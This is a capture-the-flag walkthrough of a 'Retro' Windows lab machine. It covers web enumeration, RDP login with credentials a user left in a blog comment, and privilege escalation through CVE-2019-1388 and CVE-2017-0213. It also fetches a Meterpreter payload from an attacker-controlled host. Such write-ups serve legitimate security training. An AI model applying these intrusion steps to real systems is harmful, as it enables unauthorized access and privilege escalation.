Retro

Intro

Recon

Perform Web Server directories enumeration.

The enumeration found a folder named /retro.

Use a browser to navigate to:

• http://10.10.181.110/retro/index.php/2019/12/09/ready-player-one/

📌 Wade user left a comment with his password

Use the credentials to login to the target via the open RDP Port 3389

• Wade:parzival

I suggest to set the Remmina RDP resolution to a higher one, e.g

• Open Remmina, + to create a Quick RDP Connect, select the resolution and Save as Default

• 🚩 Open the user.txt file on Wade's user desktop to get the first flag.

Exploitation

Open Internet Explorer to initialize it.

Open Google Chrome and set it as Default web browser in Windows.

The bookmarked link refers to the CVE-2019-1388 - Windows Certificate Dialog Elevation of Privilege Vulnerability.

Check the Recycle Bin and restore the hhupd file.

Exploit the privesc vulnerability present in the Windows Certificate Dialog Box and run cmd with Administrator privileges.

• Even after the initialization of both the IE and Chrome browsers, there might not be any option for selecting the browser in the opened window.

Meterpreter

Generate a manual payload to get a Metasploit Meterpreter session on the target.

Download the payload on the target browser from this link

• http://10.18.65.48/unprivileged-payload.exe

Open Metasploit and set up a handler to listen on the 4444 port

Run the unprivileged-payload.exe file on the target machine

Get systeminfo from the target and save the output to a file.

Privilege Escalation

Exploit the CVE-2017-0213 - Windows COM Elevation of Privilege Vulnerability

• Download the CVE-2017-0213_x64.zip package, unzip it and upload the CVE-2017-0213_x86.exe to the target.

Run the CVE-2017-0213_x86.exe file from the Meterpreter session or using the RDP connection on the target.

• Check the CMD as Administrator session on the target.

• 🚩 Read the root.txt file

• Remember that there can be other attack vectors to exploit target's vulnerabilities.